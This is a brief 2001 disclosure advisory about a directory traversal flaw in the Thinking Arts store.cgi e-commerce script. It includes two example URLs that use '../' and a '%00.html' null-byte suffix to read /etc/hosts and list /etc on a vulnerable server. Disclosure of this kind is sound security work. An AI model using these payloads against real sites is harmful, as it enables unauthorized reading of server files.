Thinking Arts Store.cgi Directory Traversal

[slipy () B10Z NET]

Introduction:

Thinking Arts LTD E-Commerce package comes 
with a webstore frontend called store.cgi which 
allows people to basically order products on their 
website over a SQL database. 


The vendors website is:
http://www.thinkingarts.com/  


Problem: Simple Directory Traversal

Adding the string "/../" to an URL allows an attacker to 
view any file on the server, and also list directories 
within the server which the owner of the vulnerable 
httpd has permissions to access. Remote execution 
of commands does not apear to be possible with this 
directory traversal bug, but directory listings are. 
Please note that you do need the %00.html at the end 
of your command.


Examples:

http://www.VULNERABLE.com/cgi-bin/store.cgi?
StartID=../etc/hosts%00.html
^^ = Will obviously open the hosts file. 

http://www.VULNERABLE.com/cgi-bin/store.cgi?
StartID=../etc/%00.html
^^ = Will obviously list the /etc/ directory. 



Solution:

Vendor has been contacted. No reply from them yet, 
and seeing only 3 sites who signed up for their dumb 
service are affected, so it doesn't really matter now 
does it?


--------------------
b10z cgi advisory.
slipy () b10z net

February 16th, 2001.